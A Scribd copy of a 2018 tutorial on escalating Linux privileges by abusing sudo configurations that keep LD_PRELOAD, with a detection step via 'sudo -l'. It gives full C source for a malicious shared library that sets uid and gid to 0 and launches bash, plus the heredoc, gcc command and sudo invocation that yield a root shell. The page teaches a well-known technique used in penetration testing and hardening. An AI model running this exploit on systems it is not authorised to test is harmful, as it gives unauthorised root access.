Scribd
Upload
188 views

Sudo (LD - PRELOAD) (Linux Privilege Escalation)

This document discusses exploiting the Linux LD_PRELOAD environment variable to escalate privileges. It explains that LD_PRELOAD loads a shared library before other libraries, including libc. By dropping a Trojan shared object that sets uid/gid to 0 and executes a shell, a low-privileged user can gain root access using sudo commands they have permission to run. The document provides code for a proof-of-concept Trojan library and instructions for compiling it, setting LD_PRELOAD, and triggering sudo to obtain a root shell.

Uploaded by

Aneudy Hernandez Peña
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
188 views

Sudo (LD - PRELOAD) (Linux Privilege Escalation)

This document discusses exploiting the Linux LD_PRELOAD environment variable to escalate privileges. It explains that LD_PRELOAD loads a shared library before other libraries, including libc. By dropping a Trojan shared object that sets uid/gid to 0 and executes a shell, a low-privileged user can gain root access using sudo commands they have permission to run. The document provides code for a proof-of-concept Trojan library and instructions for compiling it, setting LD_PRELOAD, and triggering sudo to obtain a root shell.

Uploaded by

Aneudy Hernandez Peña
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

Sudo (LD_PRELOAD) (Linux Privilege Escalation)

Published by Touhid Shaikh on April 12, 2018

Privilege Escalation from an LD_PRELOAD environment variable. Before exploit let’s read
something about LD_PRELOAD environment Variable.

Index
1. What is LD_PRELOAD?
2. Detection.
3. Exploit LD_PRELOAD.

What is LD_PRELOAD?
LD_PRELOAD  is an optional environmental variable containing one or more paths to
shared libraries, or shared objects, that the loader will load before any other shared library
including the C runtime library (libc.so) This is called preloading a library.

To avoid this mechanism being using as an attack vector for  suid/sgid executable binaries,
the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard
paths that are also suid/sgid will be preloaded.

For More  click here.

Detection
Fire up terminal  and type:

user@debian:~$ sudo -l  
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

If output something like this,  congratulations target is vulnerable and you can exploit
LD_PRELOAD issue to get root privilege shell and to acomplished privilege escalation you
also need some sudo permission  binary which use LD_PRELOAD envr.

some Sudo command which can be done current user .

Program File :
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Exploit LD_PRELOAD.
open terminal and go to any Writable Directory for dropping shell.

writtable directory like  

 /tmp
 /var/tmp
 /dev/shm

in our case we using  /tmp directory.

Drop a evil.c using any text editor, here we used cat for droping shell.

user@debian:/tmp$ cat << EOF >> evil.c


> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
>}
> EOF

lest Compile and make object file.

gcc -fPIC -shared -o evil.so evil.c -nostartfiles

Time to final step 3:)

sudo LD_PRELOAD=evil.so <COMMAND>

here <COMMAND> mean which command have u allowed to do with sudo.


you can use any sudo command which allowed to current user.

BooOO00m You got Root SHELL..

You might also like